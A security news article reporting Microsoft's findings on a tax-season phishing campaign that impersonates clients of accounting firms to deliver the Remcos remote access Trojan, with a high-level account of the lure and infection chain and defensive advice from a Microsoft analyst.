Remcos RAT Targets Tax Pros to Scurry Off With Workers' Filing Info

With the April 18 tax deadline approaching, hackers have been piling onto accountants' stress with a phishing campaign designed to deliver the Remcos remote access Trojan (RAT).

In a blog post published April 13, researchers from Microsoft described a campaign in which attackers are masquerading as clients of CPAs, accounting firms, and related companies handling tax information. The apparent goal is to get these financial custodians — who maintain records containing their clients' most sensitive personal information, like Social Security numbers, addresses, and incomes — to download the Remcos RAT, enabling easy Windows privilege execution.

"Those in accounting and finance must be extra vigilant at this time," says Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, who characterized the campaign as medium scale but focused. "It's a hectic time in their business when mistakes may be made."

Remcos is a commercial program from German-based Breaking Security. Short for "Remote Control and Surveillance," it enables users to gain administrator privileges on remote Windows computers. For example, hackers can use it to obtain the same kinds of privileges over a CPA's laptop as that CPA themselves has.

Though Breaking Security has claimed in the past that they only sell it for legitimate uses, Remcos and its sister products — including a keylogger, evasion tool, spam distribution tool, and more — have been making the rounds in cybercrime circles since the mid 2010s.

Phishing Accountants

The campaign begins with a carefully-crafted phishing email, a sample of which can be seen below.

Remcos phishing lure. Source: Microsoft Security Blog

Notice the subtle social engineering at play, i.e., "I apologize for not responding sooner," and even the title of the email — "Re: 2022" — imply an ongoing correspondence with an existing client. The word "confidential," and a password-protected link, lend an air of security to the entire affair. The lure is specially designed to be believable in these ways, DeGrippo says, "from its casual tone and lengthy details and instructions."

The link in the email redirects through multiple legitimate services: first an Amazon Web Services click-tracking service, then an ordinary file-hosting site, spaces[.]hightail[.]com. Both of these act as layers of evasion, shaking off potential anti-malware detection.

Sitting on the file-hosting site is a .ZIP file containing shortcut .LNK files, which send Web requests directly to the threat actor, triggering the download of any number of malicious files "such as MSI files containing DLLs or executables, VBScript files containing PowerShell commands, or deceptive PDFs," Microsoft explained. In some cases, the blog noted, the infostealer downloader GuLoader was used to download the prized goods: Remcos RAT.

Hacking Accountants in April: Savvy Cybercrime Move

That this campaign is happening now — and only began in February — is no coincidence, of course.

"Financial services firms are at their most in-demand time of year," DeGrippo notes. "I just filed my taxes this week and my CPA was clearly working long hours and responding to emails late at night. When that's the case for these kinds of firms, employees might miss something, or click on things they shouldn't."

And when a CPA slips up, it's worse than for just about any other kind of professional.

"These kinds of targets are attractive because they handle financial information of the most sensitive type," DeGrippo continues. "Taxes, Social Security number information, bookkeeping, and bank account and routing numbers are useful to threat actors directly, or they can be sold on the black market to other criminals for use in further attacks."

To help compensate for the lack of cyber hygiene that might accompany accountants' constant emails, frantic filings, and late hours this time of year, Microsoft recommended that professionals and firms block JavaScript and VBScript from launching executable content and block untrusted executable files from running. The blog post also highlighted the utility of antivirus scanning and real-time behavior monitoring.

And, DeGrippo adds, "a best practice for sending these kinds of sensitive documents is for firms to have a trusted cloud service where clients can upload their documents.

"Emailing around sensitive material is never a good idea," she concludes. "Especially when there could be malware in the mix."